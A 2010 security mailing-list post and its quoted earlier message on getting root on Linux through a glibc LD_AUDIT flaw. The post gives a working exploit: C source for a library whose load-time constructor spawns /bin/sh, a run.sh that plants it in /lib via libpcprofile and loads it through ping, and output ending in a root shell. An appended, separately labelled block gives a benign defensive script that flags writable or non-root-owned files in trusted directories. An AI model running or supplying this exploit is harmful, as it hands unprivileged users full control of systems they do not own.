Hi guys,

I finally found an easier way to gain root privileges, without
rebooting the computer.

The vulnerability can be used to upload a custom library to the
server and then execute a root shell.

The library is really simple (libevil.so)
----
#include <errno.h>
#include <unistd.h>

/* Constructor: runs as soon as the dynamic linker loads the library. */
static void
__attribute__ ((constructor))
install (void)
{
    execl("/bin/sh", "/bin/sh", (char *) 0);
}
----
u...@host:~/$ cat ./run.sh
umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping
u...@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#
I hope it is helpful.

Regards,

Xavier Garcia

On Fri, Nov 05, 2010 at 12:11:32PM +0100, Xavier Garcia wrote:
> Hi guys,
>
> I am trying to find some ways to gain root access by using the
> vulnerability described in the advisory
>
> http://marc.info/?l=full-disclosure&m=128776663124692&w=2
>
> published by Tavis Ormandy.
>
> The advisory states that Cron can be used to escalate privileges,
> but Cron does not accept files that are writable by the group or
> others, returning the error BAD FILE MODE.
>
> I have been looking for alternative ways to gain root access, but
> there are not many places where it is possible.
>
> I have found that Upstart (http://en.wikipedia.org/wiki/Upstart)
> does not check the permissions and happily reads the
> configuration files every time it restarts. This means that we can
> create a configuration file that will instruct Upstart to
> drop a root shell :)
>
>
> The downside is that we have to be patient and wait until the
> computer is rebooted, or use some social engineering.
>
>
> You can find more details at
>
> http://www.shellguardians.com/2010/11/privilege-escalation-with-upstart-and.html
>
>
> I hope this finding is interesting or useful for the list.
>
> Regards,
>
> Xavier Garcia
>
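
Added example, not part of the original message or of any project it mentions: the script above depends on a file in /lib that any user can overwrite, and the quoted message notes that Cron rejects files writable by group or others (BAD FILE MODE) while Upstart does not check. The shell functions below apply that mode-and-owner check to directories root trusts. The names `audit_dir` and `audit_all` and the sample tree are constructed for illustration, and `/usr/lib`, `/etc/init` and `/etc/cron.d` in the comment are typical paths assumed here, not taken from the thread.

```shell
#!/bin/sh
# Added example, not from the thread: report files in root-trusted
# directories that a non-root user could modify.

# audit_dir DIR [OWNER_UID]
# Prints one line per offending regular file under DIR:
#   BAD-MODE <path>    writable by group or others
#   BAD-OWNER <path>   not owned by OWNER_UID (default 0, root)
# Paths containing newlines are not handled.
audit_dir() {
    dir=$1
    owner=${2:-0}
    [ -d "$dir" ] || return 0
    find "$dir" -xdev -type f \( -perm -020 -o -perm -002 \) -print 2>/dev/null |
        sed 's/^/BAD-MODE /'
    find "$dir" -xdev -type f ! -user "$owner" -print 2>/dev/null |
        sed 's/^/BAD-OWNER /'
}

# audit_all OWNER_UID DIR...
# Audits each DIR; returns 1 if anything was reported, 0 otherwise.
audit_all() {
    owner=$1; shift
    findings=$(for d in "$@"; do audit_dir "$d" "$owner"; done)
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Constructed sample tree standing in for /lib and Upstart's job directory.
demo() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/lib" "$root/etc/init"
    : > "$root/lib/libc.so.6";     chmod 644 "$root/lib/libc.so.6"
    : > "$root/lib/libevil.so";    chmod 666 "$root/lib/libevil.so"
    : > "$root/etc/init/job.conf"; chmod 664 "$root/etc/init/job.conf"
    audit_all "$(id -u)" "$root/lib" "$root/etc/init"
    status=$?
    rm -rf "$root"
    return "$status"
}

# On a real host (typical paths, adjust per distribution):
#   audit_all 0 /lib /usr/lib /etc/init /etc/cron.d
demo || echo "findings reported, as expected for the constructed tree"
```

A non-zero exit from `audit_all` makes it usable from a scheduled integrity check or a configuration-management test.
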
_______________________________________________
Pauldotcom mailing list